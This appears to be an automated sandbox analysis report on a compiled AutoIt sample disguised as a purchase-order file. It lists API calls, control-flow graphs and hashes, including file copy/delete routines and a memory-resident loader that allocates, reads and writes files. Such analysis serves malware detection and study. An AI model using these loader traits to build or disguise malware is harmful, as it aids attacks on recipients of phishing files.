                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                                                                                                                                                                                      • String ID: >>>AUTOIT SCRIPT<<<$t2K
                                                                                                                                                                                                      • API String ID: 2955681530-1835454193
                                                                                                                                                                                                      • Opcode ID: 397c2a9de392346911fd9c790da9d7e7ae7aadc563be971c949fde63b22b24f3
                                                                                                                                                                                                      • Instruction ID: 503cd1224aee480db27c81d30548323e2f4b0e484ad6717af54db5903cf95967
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 397c2a9de392346911fd9c790da9d7e7ae7aadc563be971c949fde63b22b24f3
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 03919471604205AFDB10EF55D891E9BB3E8BF44314F00486FF98997292DB38F948CB9A
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2072069896.0000000000AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ab0000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ErrorFreeLast
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1762890227-0
                                                                                                                                                                                                      • Opcode ID: 5c9e55e231548538975b68ba1f64b9038a692d0e8a87e625926cf8b0aacd1db5
                                                                                                                                                                                                      • Instruction ID: 0e9034be3cb0448e83f567fd1142ab0ddb002e5cdf1c1381d411d58fb8264b8b
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5c9e55e231548538975b68ba1f64b9038a692d0e8a87e625926cf8b0aacd1db5
                                                                                                                                                                                                      • Instruction Fuzzy Hash: CDF10B6090C340AECB3A57685C09B7D3B756B75760F5D068BF4A7C63E2EE6C8C09D226

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00403F86
                                                                                                                                                                                                      • RegisterClassExW.USER32(00000030), ref: 00403FB0
                                                                                                                                                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00403FC1
                                                                                                                                                                                                      • InitCommonControlsEx.COMCTL32(?), ref: 00403FDE
                                                                                                                                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00403FEE
                                                                                                                                                                                                      • LoadIconW.USER32(000000A9), ref: 00404004
                                                                                                                                                                                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00404013
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                                                                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                                                                                      • API String ID: 2914291525-1005189915
                                                                                                                                                                                                      • Opcode ID: 8cbb75d3f7e5a3698af6f0d0412bdfe020db27ea78879be70f390616e49b9fa0
                                                                                                                                                                                                      • Instruction ID: 39fee9d6861713e640d73bccf1ba937979938cd6d36e5674434e574d06268e08
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8cbb75d3f7e5a3698af6f0d0412bdfe020db27ea78879be70f390616e49b9fa0
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F12108B5D01308AFDB40EFA4EC89BCDBBB4FB09704F00452AF511A62A0D7B44544CF99

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 1466 44bfa4-44c054 call 42f8a0 call 41f4ea call 4047b7 call 44bdb4 call 404517 call 4215e3 1479 44c107-44c10e call 44c56d 1466->1479 1480 44c05a-44c061 call 44c56d 1466->1480 1485 44c117 1479->1485 1486 44c110-44c112 1479->1486 1480->1486 1487 44c067-44c105 call 421dfc call 420d23 call 420cf4 call 421dfc call 420cf4 * 2 1480->1487 1490 44c11a-44c1d6 call 4044ed * 8 call 44c71a call 423499 1485->1490 1488 44c367-44c368 1486->1488 1487->1490 1491 44c385-44c393 call 4047e2 1488->1491 1525 44c1df-44c1fa call 44bdf8 1490->1525 1526 44c1d8-44c1da 1490->1526 1529 44c200-44c208 1525->1529 1530 44c28c-44c298 call 4235e4 1525->1530 1526->1488 1532 44c210 1529->1532 1533 44c20a-44c20e 1529->1533 1537 44c2ae-44c2b2 1530->1537 1538 44c29a-44c2a9 DeleteFileW 1530->1538 1534 44c215-44c233 call 4044ed 1532->1534 1533->1534 1544 44c235-44c23b 1534->1544 1545 44c25d-44c273 call 44b791 call 422aae 1534->1545 1539 44c342-44c356 CopyFileW 1537->1539 1540 44c2b8-44c32f call 44c81d call 44c845 call 44b965 1537->1540 1538->1488 1542 44c358-44c365 DeleteFileW 1539->1542 1543 44c36a-44c380 DeleteFileW call 44c6d9 1539->1543 1540->1543 1562 44c331-44c340 DeleteFileW 1540->1562 1542->1488 1543->1491 1550 44c23d-44c250 call 44bf2e 1544->1550 1559 44c278-44c283 1545->1559 1557 44c252-44c25b 1550->1557 1557->1545 1559->1529 1561 44c289 1559->1561 1561->1530 1562->1488
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 0044BDB4: __time64.LIBCMT ref: 0044BDBE
                                                                                                                                                                                                        • Part of subcall function 00404517: _fseek.LIBCMT ref: 0040452F
                                                                                                                                                                                                      • __wsplitpath.LIBCMT ref: 0044C083
                                                                                                                                                                                                        • Part of subcall function 00421DFC: __wsplitpath_helper.LIBCMT ref: 00421E3C
                                                                                                                                                                                                      • _wcscpy.LIBCMT ref: 0044C096
                                                                                                                                                                                                      • _wcscat.LIBCMT ref: 0044C0A9
                                                                                                                                                                                                      • __wsplitpath.LIBCMT ref: 0044C0CE
                                                                                                                                                                                                      • _wcscat.LIBCMT ref: 0044C0E4
                                                                                                                                                                                                      • _wcscat.LIBCMT ref: 0044C0F7
                                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 0044C03E
                                                                                                                                                                                                        • Part of subcall function 0044C56D: _wcscmp.LIBCMT ref: 0044C65D
                                                                                                                                                                                                        • Part of subcall function 0044C56D: _wcscmp.LIBCMT ref: 0044C670
                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0044C2A1
                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0044C338
                                                                                                                                                                                                      • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0044C34E
                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0044C35F
                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0044C371
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2378138488-0
                                                                                                                                                                                                      • Opcode ID: 2d3f61bed0371d27bb488f48ba0a5d5d60d1fa0b6d7278b81cc3c75f8688b2c3
                                                                                                                                                                                                      • Instruction ID: 97f54707bf9dff136f04eda468cc35fa1287b7f90913d34c6e51530f47754c09
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2d3f61bed0371d27bb488f48ba0a5d5d60d1fa0b6d7278b81cc3c75f8688b2c3
                                                                                                                                                                                                      • Instruction Fuzzy Hash: ABC12CB1E01129ABDF21DF96CC81EDEB7BDAF48304F0440ABF609E6151DB749A448F69
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2072069896.0000000000AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ab0000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: fa85c9b33f6ca759e22a6aa7780fb3d0ada8ffa18ee721c04cb0fee129f5587c
                                                                                                                                                                                                      • Instruction ID: cfd4e6a9479547da487ab775ed4688af1c0c336edc4903e0c4984182f7675734
                                                                                                                                                                                                      • Opcode Fuzzy Hash: fa85c9b33f6ca759e22a6aa7780fb3d0ada8ffa18ee721c04cb0fee129f5587c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 75A28F7150D3808FC735CB18C854BEABBE9AFD5328F094A5DE49897293E335A904CB97

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 2006 403742-403762 2008 4037c2-4037c4 2006->2008 2009 403764-403767 2006->2009 2008->2009 2010 4037c6 2008->2010 2011 4037c8 2009->2011 2012 403769-403770 2009->2012 2013 4037ab-4037b3 DefWindowProcW 2010->2013 2014 471e00-471e2e call 402ff6 call 41e312 2011->2014 2015 4037ce-4037d1 2011->2015 2016 403776-40377b 2012->2016 2017 40382c-403834 PostQuitMessage 2012->2017 2019 4037b9-4037bf 2013->2019 2049 471e33-471e3a 2014->2049 2020 4037d3-4037d4 2015->2020 2021 4037f6-40381d SetTimer RegisterWindowMessageW 2015->2021 2023 403781-403783 2016->2023 2024 471e88-471e9c call 444ddd 2016->2024 2018 4037f2-4037f4 2017->2018 2018->2019 2029 471da3-471da6 2020->2029 2030 4037da-4037ed KillTimer call 403847 call 40390f 2020->2030 2021->2018 2025 40381f-40382a CreatePopupMenu 2021->2025 2026 403836-403840 call 41eb83 2023->2026 2027 403789-40378e 2023->2027 2024->2018 2043 471ea2 2024->2043 2025->2018 2044 403845 2026->2044 2033 403794-403799 2027->2033 2034 471e6d-471e74 2027->2034 2037 471ddc-471dfb MoveWindow 2029->2037 2038 471da8-471daa 2029->2038 2030->2018 2041 471e58-471e68 call 4455bd 2033->2041 2042 40379f-4037a5 2033->2042 2034->2013 2048 471e7a-471e83 call 43a5f3 2034->2048 2037->2018 2045 471dac-471daf 2038->2045 2046 471dcb-471dd7 SetFocus 2038->2046 2041->2018 2042->2013 2042->2049 2043->2013 2044->2018 2045->2042 2050 471db5-471dc6 call 402ff6 2045->2050 2046->2018 2048->2013 2049->2013 2054 471e40-471e53 call 403847 call 404ffc 2049->2054 2050->2018 2054->2013
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • DefWindowProcW.USER32(?,?,?,?), ref: 004037B3
                                                                                                                                                                                                      • KillTimer.USER32(?,00000001), ref: 004037DD
                                                                                                                                                                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00403800
                                                                                                                                                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0040380B
                                                                                                                                                                                                      • CreatePopupMenu.USER32 ref: 0040381F
                                                                                                                                                                                                      • PostQuitMessage.USER32(00000000), ref: 0040382E
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                                                                                      • String ID: TaskbarCreated
                                                                                                                                                                                                      • API String ID: 129472671-2362178303
                                                                                                                                                                                                      • Opcode ID: 4ae2860ea2cf3a4424b1df9f2717f400eabec22553c1a915877c3a59055104d7
                                                                                                                                                                                                      • Instruction ID: 9818f98b5f829a4c8db2a31be09732de94f6fcc06798172ad55270a3605b7810
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4ae2860ea2cf3a4424b1df9f2717f400eabec22553c1a915877c3a59055104d7
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D44115F5500149ABDB145F699C4AFBA3A59FB41302F00853BF902B32E2DB7C9D51972E

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00403E79
                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00403E88
                                                                                                                                                                                                      • LoadIconW.USER32(00000063), ref: 00403E9E
                                                                                                                                                                                                      • LoadIconW.USER32(000000A4), ref: 00403EB0
                                                                                                                                                                                                      • LoadIconW.USER32(000000A2), ref: 00403EC2
                                                                                                                                                                                                        • Part of subcall function 00404024: LoadImageW.USER32(00400000,00000063,00000001,00000010,00000010,00000000), ref: 00404048
                                                                                                                                                                                                      • RegisterClassExW.USER32(?), ref: 00403F30
                                                                                                                                                                                                        • Part of subcall function 00403F53: GetSysColorBrush.USER32(0000000F), ref: 00403F86
                                                                                                                                                                                                        • Part of subcall function 00403F53: RegisterClassExW.USER32(00000030), ref: 00403FB0
                                                                                                                                                                                                        • Part of subcall function 00403F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00403FC1
                                                                                                                                                                                                        • Part of subcall function 00403F53: InitCommonControlsEx.COMCTL32(?), ref: 00403FDE
                                                                                                                                                                                                        • Part of subcall function 00403F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00403FEE
                                                                                                                                                                                                        • Part of subcall function 00403F53: LoadIconW.USER32(000000A9), ref: 00404004
                                                                                                                                                                                                        • Part of subcall function 00403F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00404013
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                                                                                      • String ID: #$0$AutoIt v3
                                                                                                                                                                                                      • API String ID: 423443420-4155596026
                                                                                                                                                                                                      • Opcode ID: 87d0efc2a200e611afc57662db2d9fe5074bb5fa0814b132d49e4943f5861427
                                                                                                                                                                                                      • Instruction ID: 6fc82eccf78ee3bbffcc202bd0bda0f016539c707d5aa7d19e764feb260bae21
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 87d0efc2a200e611afc57662db2d9fe5074bb5fa0814b132d49e4943f5861427
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E7212AB4D00304AFDB40DFAAEC45E99BFF5FB49314F14853AE214A22B2D77946508B99

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 2070 42acb3-42ace0 call 426ac0 call 427cf4 call 426986 2077 42ace2-42acf8 call 42e880 2070->2077 2078 42acfd-42ad02 2070->2078 2084 42af52-42af57 call 426b05 2077->2084 2079 42ad08-42ad0f 2078->2079 2081 42ad42-42ad51 GetStartupInfoW 2079->2081 2082 42ad11-42ad40 2079->2082 2085 42ae80-42ae86 2081->2085 2086 42ad57-42ad5c 2081->2086 2082->2079 2089 42af44-42af50 call 42af58 2085->2089 2090 42ae8c-42ae9d 2085->2090 2086->2085 2088 42ad62-42ad79 2086->2088 2092 42ad80-42ad83 2088->2092 2093 42ad7b-42ad7d 2088->2093 2089->2084 2094 42aeb2-42aeb8 2090->2094 2095 42ae9f-42aea2 2090->2095 2100 42ad86-42ad8c 2092->2100 2093->2092 2097 42aeba-42aebd 2094->2097 2098 42aebf-42aec6 2094->2098 2095->2094 2101 42aea4-42aead 2095->2101 2102 42aec9-42aed5 GetStdHandle 2097->2102 2098->2102 2103 42adae-42adb6 2100->2103 2104 42ad8e-42ad9f call 426986 2100->2104 2105 42af3e-42af3f 2101->2105 2106 42aed7-42aed9 2102->2106 2107 42af1c-42af32 2102->2107 2109 42adb9-42adbb 2103->2109 2117 42ae33-42ae3a 2104->2117 2118 42ada5-42adab 2104->2118 2105->2085 2106->2107 2110 42aedb-42aee4 GetFileType 2106->2110 2107->2105 2112 42af34-42af37 2107->2112 2109->2085 2113 42adc1-42adc6 2109->2113 2110->2107 2116 42aee6-42aef0 2110->2116 2112->2105 2114 42ae20-42ae31 2113->2114 2115 42adc8-42adcb 2113->2115 2114->2109 2115->2114 2119 42adcd-42add1 2115->2119 2120 42aef2-42aef8 2116->2120 2121 42aefa-42aefd 2116->2121 2122 42ae40-42ae4e 2117->2122 2118->2103 2119->2114 2123 42add3-42add5 2119->2123 2124 42af05 2120->2124 2125 42af08-42af1a InitializeCriticalSectionAndSpinCount 2121->2125 2126 42aeff-42af03 2121->2126 2127 42ae50-42ae72 2122->2127 2128 42ae74-42ae7b 2122->2128 2129 42add7-42ade3 GetFileType 2123->2129 2130 42ade5-42ae1a InitializeCriticalSectionAndSpinCount 2123->2130 2124->2125 2125->2105 2126->2124 2127->2122 2128->2100 2129->2130 2131 42ae1d 2129->2131 2130->2131 2131->2114
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • __lock.LIBCMT ref: 0042ACC1
                                                                                                                                                                                                        • Part of subcall function 00427CF4: __mtinitlocknum.LIBCMT ref: 00427D06
                                                                                                                                                                                                        • Part of subcall function 00427CF4: EnterCriticalSection.KERNEL32(00000000,?,00427ADD,0000000D), ref: 00427D1F
                                                                                                                                                                                                      • __calloc_crt.LIBCMT ref: 0042ACD2
                                                                                                                                                                                                        • Part of subcall function 00426986: __calloc_impl.LIBCMT ref: 00426995
                                                                                                                                                                                                        • Part of subcall function 00426986: Sleep.KERNEL32(00000000,000003BC,0041F507,?,0000000E), ref: 004269AC
                                                                                                                                                                                                      • @_EH4_CallFilterFunc@8.LIBCMT ref: 0042ACED
                                                                                                                                                                                                      • GetStartupInfoW.KERNEL32(?,004B6E28,00000064,00425E91,004B6C70,00000014), ref: 0042AD46
                                                                                                                                                                                                      • __calloc_crt.LIBCMT ref: 0042AD91
                                                                                                                                                                                                      • GetFileType.KERNEL32(00000001), ref: 0042ADD8
                                                                                                                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 0042AE11
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1426640281-0
                                                                                                                                                                                                      • Opcode ID: 2c9eff342a85ee14410e3b23e10e55eeced261fa2f51718b9a05f3e09e174de4
                                                                                                                                                                                                      • Instruction ID: 1e7d97e7c38c6da714d1d657cfbdde346f06c9dd53f7923aedc6dd297c817baf
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2c9eff342a85ee14410e3b23e10e55eeced261fa2f51718b9a05f3e09e174de4
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 23810A70A013618FCB14CF68D94059EBBF0AF05324B65426FD8A6AB3D1C73C9813CB5A

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 2187 c118e8-c1193a call c117e8 CreateFileW 2190 c11943-c11950 2187->2190 2191 c1193c-c1193e 2187->2191 2194 c11963-c1197a VirtualAlloc 2190->2194 2195 c11952-c1195e 2190->2195 2192 c11a9c-c11aa0 2191->2192 2196 c11983-c119a9 CreateFileW 2194->2196 2197 c1197c-c1197e 2194->2197 2195->2192 2198 c119ab-c119c8 2196->2198 2199 c119cd-c119e7 ReadFile 2196->2199 2197->2192 2198->2192 2201 c119e9-c11a06 2199->2201 2202 c11a0b-c11a0f 2199->2202 2201->2192 2204 c11a11-c11a2e 2202->2204 2205 c11a30-c11a47 WriteFile 2202->2205 2204->2192 2206 c11a72-c11a97 CloseHandle VirtualFree 2205->2206 2207 c11a49-c11a70 2205->2207 2206->2192 2207->2192
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00C1192D
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2073056889.0000000000C10000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_c10000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 823142352-0
                                                                                                                                                                                                      • Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                                                                                                                                                                                      • Instruction ID: d31f2858f9865614f773d73b334813334762b1d74b937795d8a04388b7054a1a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                                                                                                                                                                                      • Instruction Fuzzy Hash: CF510D75A50209FBDF20DFA0CC59FEE7B78AF48701F108554FB19EA180DA749A84EB60

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 2217 4049fb-404a25 call 40bcce RegOpenKeyExW 2220 4741cc-4741e3 RegQueryValueExW 2217->2220 2221 404a2b-404a2f 2217->2221 2222 474246-47424f RegCloseKey 2220->2222 2223 4741e5-474222 call 41f4ea call 4047b7 RegQueryValueExW 2220->2223 2228 474224-47423b call 406a63 2223->2228 2229 47423d-474245 call 4047e2 2223->2229 2228->2229 2229->2222
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00404A1D
                                                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 004741DB
                                                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0047421A
                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00474249
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
